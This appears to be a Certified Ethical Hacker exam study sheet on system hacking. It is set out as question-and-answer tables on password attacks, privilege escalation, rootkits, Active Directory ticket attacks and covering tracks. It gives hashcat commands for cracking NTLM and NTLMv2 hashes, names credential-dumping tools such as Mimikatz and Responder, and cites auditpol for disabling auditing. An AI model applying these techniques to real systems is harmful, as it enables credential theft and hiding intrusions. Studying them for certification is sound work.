16.3 Attack Types
| Question | Answer |
|---|---|
| Attack using a file with thousands of passwords? | Dictionary attack |
| Attack that tries every combination? | Brute force attack |
| Rainbow tables = what type? | Offline attack |
| Shoulder surfing = what type? | Non-electronic attack |
| Tool that captures NTLMv2 via LLMNR? | Responder |
| Adding random characters before hashing? | Salting |
| LM hash with repeated pattern twice? | Password <= 7 characters |
16.4 Escalation
| Question | Answer |
|---|---|
| User obtains admin rights → type? | Vertical escalation |
| Accessing another same-level user’s files? | Horizontal escalation |
| Stolen machine disconnected from the network? | Offline access |
| GUI interface for Metasploit? | Armitage |
| Malicious DLL in application directory? | DLL Hijacking |
| CVE-2021-36934? | HiveNightmare |
| Which one affects Qualcomm: Spectre or Meltdown? | Spectre (Meltdown = primarily Intel) |
| Windows token manipulation? | Spoofed tokens |
| Abuse of Application Compatibility Framework? | Application shimming |
16.5 Rootkits and ADS
| Question | Answer |
|---|---|
| System infected by rootkit → what to do? | Wipe and completely reinstall |
| Easiest rootkit to detect? | User mode rootkit |
| Rootkit that persists after OS reinstall? | Firmware rootkit |
| Rootkit that bypasses Windows Secure Boot? | Grayfish (bootloader) |
| Rootkit that infects the Linux RAM disk? | Horse Pill |
| ADS = ? | Alternate Data Streams (NTFS) |
| Dir command to view ADS? | dir /r |
| Hiding an image inside another image? | Steganography |
16.6 Persistence
| Question | Answer |
|---|---|
| Attack against the local SAM with Mimikatz? | Silver Ticket attack |
| Total domain access via the KRBTGT account? | Golden Ticket attack |
| Modify credentials of any AD account? | Skeleton Key attack |
| Replication via DCSync targeting KRBTGT? | Malicious replication |
| AD container that propagates rights? | AdminSDHolder |
16.7 Covering Tracks
| Question | Answer |
|---|---|
| Forensic investigation tracing back to the attacker? | Traceback |
| Difference between good vs expert attacker on logs? | Expert: disables auditing before acting |
| Windows command to disable auditing? | auditpol |
| Linux command to view history? | history |
| First event after clearing a Windows log? | ”Log Cleared” event |
16.8 Tools and Hashcat
| Question | Answer |
|---|---|
| Hashcat for NTLM? | hashcat -m 1000 -a 0 hash.txt wordlist.txt |
| Hashcat for NTLMv2 (Responder)? | hashcat -m 5600 -a 0 hash.txt wordlist.txt |
| Hashcat brute-force mode? | -a 3 |
| Hashcat dictionary mode? | -a 0 |
| Hashcat hybrid wordlist + mask mode? | -a 6 |
| Tool to capture NTLMv2 via LLMNR? | Responder |
| How to disable LLMNR? | Via GPO |
| Kali tool to extract in-memory credentials? | Mimikatz |
| Post-exploitation Linux enumeration tool? | LinPEAS |
| Catalog of abusable Unix binaries? | GTFOBins (gtfobins.github.io) |
Next course: Malware Threats
GTFOBins: gtfobins.github.io
HaveIBeenPwned: haveibeenpwned.com
Search Terms
ceh · ethical · hacking · system · systems · cybersecurity · networking · security · types · access · attack · escalation · tools · cracking · essential · password · passwords · tracks · attacker · chm · commands · covering · gaining · persistence